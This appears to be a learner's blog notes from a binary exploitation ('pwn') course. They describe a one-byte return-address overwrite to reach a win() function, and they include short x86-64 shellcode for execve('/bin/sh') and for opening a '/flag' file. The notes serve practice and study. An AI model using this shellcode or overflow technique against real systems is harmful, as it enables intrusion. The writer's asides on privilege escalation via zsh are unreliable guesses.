Pwn Day8–9

I heard great things about pwn. Its time to finally go through it from Beginning to End!

I am using Medium as a repo for my notes from the pwn courses.

Previously I went over partial overwrites

Continuing from that

The recap is all I have to overwrite to return win function is the one byte.

Proof is in the objdump

What I highlighted was the current value of ret. If I rerun this program

As seen, All trailing bytes are different, but the rest is all the same!

So a simple 120 byte overflow with 1 extra practical overwrite and I get this

A pointer to win()

This as simple as ret2win gets in all honestly.

I want to note this always does not work because of randomization

We can see that above as shown

The current challenge I am stuck on is giving me this

So I am trying to access memory out of scope is my guess

I know for my syscall I want exeve(“/bin/sh”,0,0)

        mov rax, 59
        lea rdi, [rip+binsh]

        mov rsi,0
        mov rdx,0

Looks like I got the shell, but permissions are not valid. This is due to /bin/sh only escalating to user privs

from the strace I can confirm execve is working properly from the return of 0

Well, from looking at other shells, I can use zsh to escalate!

This time I want to fetch the flag through the open file descriptor

.global _start
_start:
.intel_syntax noprefix
mov rbx, 0x00000067616c662f
push rbx
mov rax, 2
mov rdi, rsp
mov rsi,0
syscall

Looks like I didnt create a fd because of an error. This is due to bad prems.

Because this fd which handles files is not working the way I want, time to execute this as root